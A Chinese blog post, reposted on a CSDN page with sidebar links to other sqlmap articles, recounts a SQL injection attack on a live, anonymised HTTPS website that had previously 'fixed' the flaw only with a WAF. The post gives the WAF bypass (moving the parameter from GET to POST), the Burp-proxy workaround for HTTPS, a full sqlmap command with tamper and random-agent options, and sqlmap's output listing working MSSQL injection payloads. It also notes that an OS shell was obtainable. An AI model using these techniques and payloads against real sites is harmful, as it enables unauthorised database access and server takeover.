sqlmap----实战https

最新推荐文章于 2024-06-25 09:11:48 发布
最新推荐文章于 2024-06-25 09:11:48 发布
阅读量6.3k 收藏 5
点赞数
原文链接:https://www.cnblogs.com/-qing-/p/10508570.html
版权

在这里插入图片描述
在这里插入图片描述

-==================================================================

 

 

记一次SQL注入

 

目标地址:https://www.xxxx.com/

 

之前补天提交过这个注入  后来貌似”修复了”(实际就是装了安全狗和过滤了一些关键字)

 

不过今天试了下 还是可以注入

 

 

 

可以看到已经有安全狗拦截get方式的注入字符

 

目标站是伪静态重写了url 改一下提交规则即可

 

改成post提交(默认安全狗只拦截get方式)

 

 

可以接受post参数 经过测试 拦截了一些空格和敏感字符

 

 

 

直接上sqlmap跑 注意线程和伪造http头

 

 

因为目标站是https 我加了--force-ssl参数 指定为https,但是显示https 连接出错。

因为sqlmap没办法忽略https证书 所以有两个解决方法

  1. 通过本地代理端口进行访问

  2. 通过搭建web,访问代理文件进行注入

 

 

第一种简单又不涉及代码 直接burpsuite代理本地8080端口,然后sqlmap通过8080端口进行访问注入即可(当然其他本地映射charles也可以)

 

 

 

-u https://www.xxx.com/news_show.asp --data=id=3395 --safe-url=https://www.xxxx.com/news_show.asp?/3395.html --safe-freq=2 --tamper space2comment.py --force-ssl --proxy http://127.0.0.1:8080 --random-agent -v 3

 

 

结果:

复制代码 
Parameter: id (POST)

</span><span class="typ">Type</span><span class="pun">:</span><span class="pln"> </span><span class="kwd">boolean</span></span><span class="pun">-</span><span style="color: #000000;"><span class="pln">based blind

</span><span class="typ">Title</span><span class="pun">:</span><span class="pln"> AND </span><span class="kwd">boolean</span></span><span class="pun">-</span><span class="pln">based blind </span><span class="pun">-</span><span style="color: #000000;"><span class="pln"> WHERE </span><span class="kwd">or</span><span class="pln"> HAVING clause

</span><span class="typ">Payload</span><span class="pun">:</span><span class="pln"> id</span></span><span class="pun">=</span><span style="color: #800080;"><span class="lit">3395</span></span><span class="pln"> AND </span><span style="color: #800080;"><span class="lit">1967</span></span><span class="pun">=</span><span style="color: #800080;"><span class="lit">1967</span></span><span style="color: #000000;"><span class="pln">

</span><span class="typ">Vector</span><span class="pun">:</span><span class="pln"> AND </span><span class="pun">[</span><span class="pln">INFERENCE</span><span class="pun">]</span><span class="pln">



</span><span class="typ">Type</span><span class="pun">:</span><span class="pln"> error</span></span><span class="pun">-</span><span style="color: #000000;"><span class="pln">based

</span><span class="typ">Title</span><span class="pun">:</span><span class="pln"> </span><span class="typ">Microsoft</span><span class="pln"> SQL </span><span class="typ">Server</span></span><span class="pun">/</span><span class="typ">Sybase</span><span class="pln"> AND error</span><span class="pun">-</span><span class="pln">based </span><span class="pun">-</span><span style="color: #000000;"><span class="pln"> WHERE </span><span class="kwd">or</span><span class="pln"> HAVING clause </span><span class="pun">(</span><span class="pln">IN</span><span class="pun">)</span><span class="pln">

</span><span class="typ">Payload</span><span class="pun">:</span><span class="pln"> id</span></span><span class="pun">=</span><span style="color: #800080;"><span class="lit">3395</span></span><span class="pln"> AND </span><span style="color: #800080;"><span class="lit">8669</span></span><span class="pln"> IN </span><span class="pun">(</span><span class="pln">SELECT </span><span class="pun">(</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">113</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">118</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">106</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">98</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">113</span></span><span class="pun">)+(</span><span class="pln">SELECT </span><span class="pun">(</span><span class="pln">CASE WHEN </span><span class="pun">(</span><span style="color: #800080;"><span class="lit">8669</span></span><span class="pun">=</span><span style="color: #800080;"><span class="lit">8669</span></span><span class="pun">)</span><span class="pln"> THEN CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">49</span></span><span class="pun">)</span><span class="pln"> ELSE CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">48</span></span><span class="pun">)</span><span class="pln"> </span><span class="kwd">END</span><span class="pun">))+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">113</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">112</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">107</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">118</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">113</span></span><span style="color: #000000;"><span class="pun">)))</span><span class="pln">

</span><span class="typ">Vector</span><span class="pun">:</span><span class="pln"> AND </span><span class="pun">[</span><span class="pln">RANDNUM</span><span class="pun">]</span><span class="pln"> IN </span><span class="pun">(</span><span class="pln">SELECT </span><span class="pun">(</span></span><span style="color: #800000;"><span class="str">'</span></span><span style="color: #800000;"><span class="str">[DELIMITER_START]</span></span><span style="color: #800000;"><span class="str">'</span></span><span class="pun">+([</span><span class="pln">QUERY</span><span class="pun">])+</span><span style="color: #800000;"><span class="str">'</span></span><span style="color: #800000;"><span class="str">[DELIMITER_STOP]</span></span><span style="color: #800000;"><span class="str">'</span></span><span style="color: #000000;"><span class="pun">))</span><span class="pln">



</span><span class="typ">Type</span><span class="pun">:</span><span class="pln"> </span><span class="kwd">inline</span><span class="pln"> query

</span><span class="typ">Title</span><span class="pun">:</span><span class="pln"> </span><span class="typ">Microsoft</span><span class="pln"> SQL </span><span class="typ">Server</span></span><span class="pun">/</span><span style="color: #000000;"><span class="typ">Sybase</span><span class="pln"> </span><span class="kwd">inline</span><span class="pln"> queries

</span><span class="typ">Payload</span><span class="pun">:</span><span class="pln"> id</span></span><span class="pun">=(</span><span class="pln">SELECT CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">113</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">118</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">106</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">98</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">113</span></span><span class="pun">)+(</span><span class="pln">SELECT </span><span class="pun">(</span><span class="pln">CASE WHEN </span><span class="pun">(</span><span style="color: #800080;"><span class="lit">6806</span></span><span class="pun">=</span><span style="color: #800080;"><span class="lit">6806</span></span><span class="pun">)</span><span class="pln"> THEN CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">49</span></span><span class="pun">)</span><span class="pln"> ELSE CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">48</span></span><span class="pun">)</span><span class="pln"> </span><span class="kwd">END</span><span class="pun">))+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">113</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">112</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">107</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">118</span></span><span class="pun">)+</span><span class="pln">CHAR</span><span class="pun">(</span><span style="color: #800080;"><span class="lit">113</span></span><span style="color: #000000;"><span class="pun">))</span><span class="pln">

</span><span class="typ">Vector</span><span class="pun">:</span><span class="pln"> </span><span class="pun">(</span><span class="pln">SELECT </span></span><span style="color: #800000;"><span class="str">'</span></span><span style="color: #800000;"><span class="str">[DELIMITER_START]</span></span><span style="color: #800000;"><span class="str">'</span></span><span class="pun">+([</span><span class="pln">QUERY</span><span class="pun">])+</span><span style="color: #800000;"><span class="str">'</span></span><span style="color: #800000;"><span class="str">[DELIMITER_STOP]</span></span><span style="color: #800000;"><span class="str">'</span></span><span style="color: #000000;"><span class="pun">)</span><span class="pln">



</span><span class="typ">Type</span><span class="pun">:</span><span class="pln"> stacked queries

</span><span class="typ">Title</span><span class="pun">:</span><span class="pln"> </span><span class="typ">Microsoft</span><span class="pln"> SQL </span><span class="typ">Server</span></span><span class="pun">/</span><span style="color: #000000;"><span class="typ">Sybase</span><span class="pln"> stacked queries </span><span class="pun">(</span><span class="pln">comment</span><span class="pun">)</span><span class="pln">

</span><span class="typ">Payload</span><span class="pun">:</span><span class="pln"> id</span></span><span class="pun">=</span><span style="color: #800080;"><span class="lit">3395</span></span><span class="pun">;</span><span class="pln">WAITFOR DELAY </span><span style="color: #800000;"><span class="str">'</span></span><span style="color: #800000;"><span class="str">0:0:5</span></span><span style="color: #800000;"><span class="str">'</span></span><span class="pun">--</span><span style="color: #000000;"><span class="pln">

</span><span class="typ">Vector</span><span class="pun">:</span><span class="pln"> </span><span class="pun">;</span><span class="pln">IF</span><span class="pun">([</span><span class="pln">INFERENCE</span><span class="pun">])</span><span class="pln"> WAITFOR DELAY </span></span><span style="color: #800000;"><span class="str">'</span></span><span style="color: #800000;"><span class="str">0:0:[SLEEPTIME]</span></span><span style="color: #800000;"><span class="str">'</span></span><span class="pun">--</span><span style="color: #000000;"><span class="pln">



</span><span class="typ">Type</span><span class="pun">:</span><span class="pln"> AND</span></span><span class="pun">/</span><span class="pln">OR time</span><span class="pun">-</span><span style="color: #000000;"><span class="pln">based blind

</span><span class="typ">Title</span><span class="pun">:</span><span class="pln"> </span><span class="typ">Microsoft</span><span class="pln"> SQL </span><span class="typ">Server</span></span><span class="pun">/</span><span class="typ">Sybase</span><span class="pln"> time</span><span class="pun">-</span><span class="pln">based blind </span><span class="pun">(</span><span class="pln">IF </span><span class="pun">-</span><span style="color: #000000;"><span class="pln"> comment</span><span class="pun">)</span><span class="pln">

</span><span class="typ">Payload</span><span class="pun">:</span><span class="pln"> id</span></span><span class="pun">=</span><span style="color: #800080;"><span class="lit">3395</span></span><span class="pln"> WAITFOR DELAY </span><span style="color: #800000;"><span class="str">'</span></span><span style="color: #800000;"><span class="str">0:0:5</span></span><span style="color: #800000;"><span class="str">'</span></span><span class="pun">--</span><span style="color: #000000;"><span class="pln">

Vector: IF([INFERENCE]) WAITFOR DELAY 0:0:[SLEEPTIME]

复制代码

 

 

 

因为是SQL server 不需要找路径,测试后可以--os-shell 有写入权限 后面就不深入测试了

 

bylfsj
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入-注入漏洞获得数据库数据-kali-sqlmap-运维安全详细笔记
06-30
1. SQLMapSQLMap 是一个开源的 SQL 注入检测工具,可以自动检测 SQL 注入漏洞。 2. Burp Suite:Burp Suite 是一个 Web 应用安全检测工具,包含 SQL 注入检测功能。 六、总结 SQL 注入是一种常见的 Web 应用安全...
sqli-lib64关闯关笔记学习资料.zip
08-22
这本书可能包含了大量的实战案例和解析,对于初学者和有一定基础的学习者都十分有益。 在WAMP环境下进行学习,意味着你将使用Windows操作系统,Apache Web服务器,MySQL数据库,以及PHP编程语言。这是一个常见的...
sqlmaphttps网站
热门推荐
good good study
05-09 1万+
目录 通过本地代理端口进行访问 使用sqlmap注入https的网站时,如果没有进行任何处理则会报错如下。就是因为ssl证书的原因,而且sqlmap它是不能自动伪造ssl证书的 sqlmap直接加上--force-ssl参数,然后还是ssl报错。所以这种方法不好使 通过本地代理端口进行访问 这里通过代理本地的burp进行访问,如下 1. burp开启代理监听端口 监听的ip为现在使用的网卡的ip,端口输入如8081 2. 使用--proxy参数 如下进行代理,成功解决ssl报错
使用sqlmap注入https网站
m2a3181的博客
08-05 2138
由于有些网站使用了https,导致sqlmap不能正常的测试扫描。可以通过以下办法解决 首先,在bp中设置代理,该ip为自己网卡的ip。使用ipconfig命令即可查看 在使用sqlmap时的payload要加上下图中标红的字段 这样,就可以正常的测试了 ...
【网络安全渗透测试零基础入门必知必会】之SQLmap安装&实战(非常详细)零基础入门到精通,收藏这一篇就够了(4)
最新发布
Libra1313的博客
06-25 1131
这是大白给粉丝盆友们整理的网络安全渗透测试入门阶段SQLmap第四篇。本阶段主要讲解什么是SQLmap安装和实战案例。
SQLMAPHTTPS的注入
凡宇
07-18 9574
记一次SQL注入 目标地址:https://www.xxxx.com/ 之前补天提交过这个注入后来貌似”修复了”(实际就是装了安全狗和过滤了一些关键字) 不过今天试了下还是可以注入 可以看到已经有安全狗拦截get方式的注入字符 目标站是伪静态重写了url改一下提交规则即可 改成post提交(默认安全狗只拦截get方式) ...
SQLMap
每天早起吃早餐
03-20 5872
概念 1. 什么是SQL注入?[1] SQL注入是一种代码注入技术,过去常常用于攻击数据驱动性的应用,比如将恶意的SQL代码注入到特定字段用于实施拖库攻击等。SQL注入的成功必须借助应用程序的安全漏洞,例如用户输入没有经过正确地过滤(针对某些特定字符串)或者没有特别强调类型的时候,都容易造成异常地执行SQL语句。SQL注入是网站渗透中最常用的攻击技术,但是其实SQL注入可以用来
SQLmap
菜鸟-宇的个人博客
10-02 32
sqlmap是一款基于python编写的渗透测试工具,在sql检测和利用方面功能强大,支持多种数据库。
黑客工具之sqlmap安装使用详解(非常详细)零基础入门到精通,收藏这一篇就够了
leah126的博客
02-01 1300
这些选项可以用来创建用户自定义函数`--udf-inject 注入用户自定义函数`` ` `--shared-lib=SHLIB 共享库的本地路径`
spring_mybatis_spring-mybatis_
10-02
- **sqlmap-config.xml**:MyBatis的映射配置文件,用于定义Mapper接口与XML文件的关联。 - **spring-context.xml**:Spring的配置文件,用于定义Bean,包括SqlSessionFactoryBean、MapperScannerConfigurer(扫描...
第二十三节 Sqlmap通用参数3-01
09-15
Sqlmap是一款强大的、自动化SQL注入工具,主要用于检测和利用网站应用程序中的SQL注入漏洞。这款工具以其易用性和高效性在安全行业中备受推崇。...在后续的课程中,我们将继续深入探索Sqlmap的更多高级特性和实战技巧。
Python-专注于聚合和记录各种SQL注入方法的wiki
08-10
- 使用Python编写的扫描工具,如SQLMap和OWASP ZAP,能够自动化检测Web应用是否存在SQL注入漏洞。 - Python库如`sqlparse`用于解析SQL语句,有助于识别潜在的注入点。 4. **防御SQL注入的策略** - 参数化查询:...
超详细SQLMap使用攻略及技巧
喜欢Python编程的程序员柚柚呀
12-20 4965
sqlmap支持MySQL, Oracle,PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird,Sybase和SAP MaxDB等数据库的各种安全漏洞检测。sqlmap支持五种不同的注入模式:l 基于布尔的盲注,即可以根据返回页面判断条件真假的注入;l 基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断;
Windows下Sqlmap的使用
李星宇的博客
08-02 3158
一、下载   首先,需下载SqlMap以及适用于Windows系统的Python。下载地址如下:  1.1、SqlMap下载地址:https://github.com/sqlmapproject/sqlmap/tarball/master 可下载到最新版本的SqlMap;  1.2、Python下载地址:https://www.python.org/ 可下载到相应的Python.
超详细SQLMap使用攻略及技巧分享
Y525698136的博客
12-26 1410
sqlmap是一个开源的渗透测试工具,可以用来进行自动化检测,利用SQL注入漏洞,获取数据库服务器的权限。
黑客工具之sqlmap安装教程,超详细使用教程(附工具安装包)
qq_44005305的博客
03-05 2282
这些选项可以用来创建用户自定义函数​​​​​​​--udf-inject 注入用户自定义函数--shared-lib=SHLIB 共享库的本地路径。
SQLMAP介绍及使用
qq_53742230的博客
07-06 2821
安全工具SQLMAP的使用
sqlmap的使用
流浪法师的博客
12-19 2505
sqlmap简单实用教程,后续继续更新!
渗透测试---手把手教你sqlmap数据库注入测试(1)---靶场实战
weixin_52796034的博客
10-14 2791
SQLMap,就像它的名字所暗示的,是一个为我们提供方便的“SQL注入攻击”的工具。对于那些不熟悉这个概念的人来说,SQL注入是一种黑客攻击技术,允许攻击者在目标网站的数据库中执行恶意SQL语句。这意味着我们可以控制和操纵网站的数据,甚至可以完全接管整个网站。那么SQLMap如何帮助我们实现这些呢?
sqlmap实战sql注入漏洞
08-17
在进行sqlmap实战之前,首先需要确认目标网站是否存在SQL注入漏洞。可以通过访问网页并尝试使用一些特殊字符或语法进行测试。引用中的示例展示了如何使用id=参数进行测试,如果返回的结果与预期不符,说明该页面可能...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值